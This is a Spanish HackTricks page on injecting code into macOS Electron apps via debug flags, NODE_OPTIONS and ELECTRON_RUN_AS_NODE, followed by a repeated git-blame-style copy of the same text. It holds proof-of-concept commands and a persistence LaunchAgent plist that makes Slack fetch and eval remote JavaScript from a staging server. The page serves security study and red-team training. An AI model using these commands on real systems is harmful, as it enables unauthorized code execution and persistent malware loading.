hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md

## Inyección de aplicaciones Electron en macOS

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Agregar código a aplicaciones Electron

El código JS de una aplicación Electron no está firmado, por lo que un atacante podría mover la aplicación a una ubicación escribible, inyectar código JS malicioso y lanzar esa aplicación y abusar de los permisos TCC.

Sin embargo, se **necesita** el permiso **`kTCCServiceSystemPolicyAppBundles`** para modificar una aplicación, por lo que por defecto esto ya no es posible.

## Inspeccionar aplicaciones Electron

Según [**esto**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), si ejecutas una aplicación Electron con banderas como **`--inspect`**, **`--inspect-brk`** y **`--remote-debugging-port`**, se abrirá un **puerto de depuración** para que puedas conectarte a él (por ejemplo, desde Chrome en `chrome://inspect`) y podrás **inyectar código en él** o incluso lanzar nuevos procesos.\
Por ejemplo:

{% code overflow="wrap" %}
```bash
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
```
{% endcode %}

{% hint style="danger" %}
Tenga en cuenta que ahora las aplicaciones de Electron **fortificadas** con **RunAsNode** deshabilitado **ignorarán los parámetros de node** (como --inspect) cuando se inicien a menos que la variable de entorno **`ELECTRON_RUN_AS_NODE`** esté establecida.

Sin embargo, aún podría usar el parámetro de electron `--remote-debugging-port=9229`, pero la carga útil anterior no funcionará para ejecutar otros procesos.
{% endhint %}

## `NODE_OPTIONS`

{% hint style="warning" %}
Esta variable de entorno solo funcionaría si la aplicación de Electron no ha sido fortificada adecuadamente y lo permite. Si está fortificada, también deberá usar la **variable de entorno `ELECTRON_RUN_AS_NODE`**.
{% endhint %}

Con esta combinación, podría almacenar la carga útil en un archivo diferente y ejecutar ese archivo:

{% code overflow="wrap" %}
```bash
# Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Ca$

# Execute
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
```
## `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>

Según [**la documentación**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), si esta variable de entorno está establecida, iniciará el proceso como un proceso normal de Node.js. 

{% code overflow="wrap" %}
```bash
# Run this
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
# Then from the nodeJS console execute:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
```
{% endcode %}

Como se [propone aquí](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), se podría abusar de esta variable de entorno en un plist para mantener la persistencia:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>EnvironmentVariables</key>
    <dict>
           <key>ELECTRON_RUN_AS_NODE</key>
           <string>true</string>
    </dict>
    <key>Label</key>
    <string>com.xpnsec.hideme</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Slack.app/Contents/MacOS/Slack</string>
        <string>-e</string>
        <string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['backdoors/salseo.md', 'generic-methodologies-and-resources/ 2023-06-14 01:25:18 +00:00			`## Inyección de aplicaciones Electron en macOS`
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00
Translated ['backdoors/salseo.md', 'generic-methodologies-and-resources/ 2023-06-14 01:25:18 +00:00			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['backdoors/salseo.md', 'generic-methodologies-and-resources/ 2023-06-14 11:51:06 +00:00			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
Translated ['backdoors/salseo.md', 'generic-methodologies-and-resources/ 2023-06-14 01:25:18 +00:00			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## Agregar código a aplicaciones Electron`

			`El código JS de una aplicación Electron no está firmado, por lo que un atacante podría mover la aplicación a una ubicación escribible, inyectar código JS malicioso y lanzar esa aplicación y abusar de los permisos TCC.`

			Sin embargo, se necesita el permiso `kTCCServiceSystemPolicyAppBundles` para modificar una aplicación, por lo que por defecto esto ya no es posible.

			`## Inspeccionar aplicaciones Electron`

			Según [esto](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), si ejecutas una aplicación Electron con banderas como `--inspect`, `--inspect-brk` y `--remote-debugging-port`, se abrirá un puerto de depuración para que puedas conectarte a él (por ejemplo, desde Chrome en `chrome://inspect`) y podrás inyectar código en él o incluso lanzar nuevos procesos.\
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00			`Por ejemplo:`

			`{% code overflow="wrap" %}`
			```bash
			`/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229`
			`# Connect to it using chrome://inspect and execute a calculator with:`
			`require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')`
			```
			`{% endcode %}`

			`{% hint style="danger" %}`
Translated ['backdoors/salseo.md', 'generic-methodologies-and-resources/ 2023-06-14 11:51:06 +00:00			Tenga en cuenta que ahora las aplicaciones de Electron fortificadas con RunAsNode deshabilitado ignorarán los parámetros de node (como --inspect) cuando se inicien a menos que la variable de entorno `ELECTRON_RUN_AS_NODE` esté establecida.
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00
Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 10:21:10 +00:00			Sin embargo, aún podría usar el parámetro de electron `--remote-debugging-port=9229`, pero la carga útil anterior no funcionará para ejecutar otros procesos.
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00			`{% endhint %}`

Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 10:21:10 +00:00			## `NODE_OPTIONS`

			`{% hint style="warning" %}`
			Esta variable de entorno solo funcionaría si la aplicación de Electron no ha sido fortificada adecuadamente y lo permite. Si está fortificada, también deberá usar la variable de entorno `ELECTRON_RUN_AS_NODE`.
			`{% endhint %}`

			`Con esta combinación, podría almacenar la carga útil en un archivo diferente y ejecutar ese archivo:`

			`{% code overflow="wrap" %}`
			```bash
			`# Content of /tmp/payload.js`
			`require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Ca$`

			`# Execute`
			`NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord`
			```
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00			## `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>

Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 10:21:10 +00:00			`Según [la documentación](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), si esta variable de entorno está establecida, iniciará el proceso como un proceso normal de Node.js.`
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00
			`{% code overflow="wrap" %}`
			```bash
			`# Run this`
			`ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord`
			`# Then from the nodeJS console execute:`
			`require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')`
			```
			`{% endcode %}`

			`Como se [propone aquí](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), se podría abusar de esta variable de entorno en un plist para mantener la persistencia:`
			```xml
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
			`<key>EnvironmentVariables</key>`
			`<dict>`
			`<key>ELECTRON_RUN_AS_NODE</key>`
			`<string>true</string>`
			`</dict>`
			`<key>Label</key>`
			`<string>com.xpnsec.hideme</string>`
			`<key>ProgramArguments</key>`
			`<array>`
			`<string>/Applications/Slack.app/Contents/MacOS/Slack</string>`
			`<string>-e</string>`
			`<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>`
			`</array>`
			`<key>RunAtLoad</key>`
			`<true/>`
			`</dict>`
			`</plist>`
			```
			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén la [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 10:21:10 +00:00			`* Únete al [💬](https://emojipedia.org/speech-balloon/) grupo de Discord o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden 2023-06-13 00:36:56 +00:00			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`